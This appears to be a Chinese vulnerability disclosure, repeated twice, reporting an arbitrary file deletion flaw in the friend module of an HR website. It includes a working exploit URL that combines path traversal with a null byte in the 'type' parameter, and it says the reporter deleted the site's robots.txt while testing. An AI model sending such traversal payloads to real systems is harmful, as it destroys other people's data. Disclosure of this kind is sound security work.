VULHUB ™

### 简要描述： 只要有任意文件删除 这系统绝对崩。 我吐个槽，最新的过滤文件实在是太BT了，只要有select and .... 就die() 伤不起啊 ### 详细说明： 问题出在 friend\model\index.class.php [<img src="https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg" alt=".." width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg) [<img src="https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg" alt="asda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg) ### 漏洞证明： 1.注册个用户 2.访问 http://www.hr135.com/friend/index.php?C=save_avatar&task=save_avatar&type=big/../../../robots.txt%00&photoServer=http://www.hr135.comhttps://images.seebug.org/upload/friend/20140101/13887792315.JPG&from=icon&photoId=13887792315.JPG 访问2次,因为第一次 没有update到表里面 第二次查询出来 就删除了. 很抱歉 把robots.txt 删除了测试而已

### 简要描述： 只要有任意文件删除 这系统绝对崩。 我吐个槽，最新的过滤文件实在是太BT了，只要有select and .... 就die() 伤不起啊 ### 详细说明： 问题出在 friend\model\index.class.php [<img src="https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg" alt=".." width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg) [<img src="https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg" alt="asda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg) ### 漏洞证明： 1.注册个用户 2.访问 http://www.hr135.com/friend/index.php?C=save_avatar&task=save_avatar&type=big/../../../robots.txt%00&photoServer=http://www.hr135.comhttps://images.seebug.org/upload/friend/20140101/13887792315.JPG&from=icon&photoId=13887792315.JPG 访问2次,因为第一次 没有update到表里面 第二次查询出来 就删除了. 很抱歉 把robots.txt 删除了测试而已